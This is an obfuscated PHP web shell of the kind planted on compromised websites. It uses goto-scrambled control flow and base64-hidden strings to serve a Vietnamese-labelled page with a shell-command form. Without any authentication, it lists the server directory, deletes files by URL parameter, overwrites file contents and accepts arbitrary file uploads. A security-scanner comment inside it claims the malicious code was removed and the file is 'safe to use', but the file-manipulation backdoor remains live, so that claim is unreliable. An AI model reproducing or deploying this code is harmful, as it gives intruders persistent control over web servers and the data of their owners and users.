<?php  goto wGgq2; wGgq2: ?>
<!doctypehtml><html><head><title>Процессни саделештирмек .</title><link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"rel="stylesheet"><style>.btn-action{margin-right:5px}</style></head><body><div class="container"><h1>Процессни саделештирмек .</h1><div class="mb-3"><form method="POST"><label for="shellCommand"class="form-label">Nhập lệnh Shell</label> <input name="shellCommand"id="shellCommand"class="form-control"> <button class="btn btn-primary mt-2"type="submit">Thực hiện lệnh</button></form></div><div class="mb-3"id="result"><?php  goto edCMG; CFWCH: ?>
</div><?php  goto CYyhH; edCMG: 
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code have been removed, and the file is now safe to use.
* Feel free to contact Imunify support team at https://www.imunify360.com/support/new
*/
 goto CFWCH; Qhnj0: if (isset($_GET[base64_decode('ZGVsZXRl')])) { $j0 = $_GET[base64_decode('ZGVsZXRl')]; $l1 = $q2 . $j0; if (file_exists($l1) && !is_dir($l1)) { unlink($l1); } } goto k_LnV; QRmKy: $o3 = scandir($q2); goto YtKZB; CYyhH: $q2 = base64_decode('Li8='); goto W3bNb; YtKZB: ?>
<table class="table"><thead><tr><th>Tên</th><th>Loại</th><th>Kích thước</th><th>Thao tác</th></tr></thead><tbody><?php  goto OOmxh; OOmxh: foreach ($o3 as $o4) { if ($o4 != base64_decode('Lg==') && $o4 != base64_decode('Li4=')) { $q5 = $q2 . $o4; $s6 = is_dir($q5) ? base64_decode('VGjGsCBt4bulYw==') : base64_decode('VOG6rXAgdGlu'); $x7 = is_dir($q5) ? base64_decode('LQ==') : filesize($q5); echo base64_decode('PHRyPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkPjxhIGhyZWY9Ig==') . $q5 . base64_decode('Ij4=') . $o4 . base64_decode('PC9hPjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQ+') . $s6 . base64_decode('PC90ZD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD4=') . $x7 . base64_decode('IGJ5dGVzPC90ZD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YnV0dG9uIHR5cGU9ImJ1dHRvbiIgZGF0YS1maWxlPSI=') . $o4 . base64_decode('IiBjbGFzcz0iYnRuIGJ0bi1wcmltYXJ5IGJ0bi1hY3Rpb24gZWRpdC1idG4iPlPhu61hPC9idXR0b24+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iP2RlbGV0ZT0=') . $o4 . base64_decode('IiBjbGFzcz0iYnRuIGJ0bi1kYW5nZXIgYnRuLWFjdGlvbiI+WMOzYTwvYT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPC90cj4='); } } goto EVBOP; k_LnV: if (isset($_POST[base64_decode('ZWRpdA==')])) { $c8 = $_POST[base64_decode('ZmlsZV9uYW1l')]; $s9 = $_POST[base64_decode('ZmlsZV9jb250ZW50')]; $sa = $q2 . $c8; if (file_exists($sa) && !is_dir($sa)) { file_put_contents($sa, $s9); } } goto QRmKy; W3bNb: if (isset($_POST[base64_decode('c3VibWl0')])) { $o3 = $_FILES[base64_decode('ZmlsZQ==')]; foreach ($o3[base64_decode('bmFtZQ==')] as $xb => $pc) { move_uploaded_file($o3[base64_decode('dG1wX25hbWU=')][$xb], $q2 . $pc); } } goto Qhnj0; EVBOP: ?>
</tbody></table><form method="post"action=""class="mt-4"enctype="multipart/form-data"><div class="form-group"><input name="file[]"type="file"multiple required></div><button class="btn btn-success"type="submit"name="submit">Upload</button></form><div class="fade modal"id="editModal"aria-hidden="true"aria-labelledby="editModalLabel"role="dialog"tabindex="-1"><div class="modal-dialog"role="document"><div class="modal-content"><div class="modal-header"><h5 class="modal-title"id="editModalLabel">Sửa file</h5><button class="close"type="button"aria-label="Close"data-dismiss="modal"><span aria-hidden="true">×</span></button></div><div class="modal-body"><form method="post"action=""class="mt-4"id="editForm"><input name="file_name"id="editFileName"type="hidden"><div class="form-group"><label for="file_content">Nội dung file:</label> <textarea class="form-control"id="editFileContent"name="file_content"rows="10"></textarea></div><button class="btn btn-success"type="submit"name="edit">Lưu thay đổi</button></form></div></div></div></div></div><script src="https://code.jquery.com/jquery-3.3.1.min.js"></script><script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script><script>$(document).ready(function(){$(".edit-btn").click(function(){var t=$(this).data("file");$.ajax({url:"./get_file_content.php",type:"POST",data:{file_name:t},success:function(e){$("#editFileName").val(t),$("#editFileContent").val(e),$("#editModal").modal("show")}})})})</script></body></html>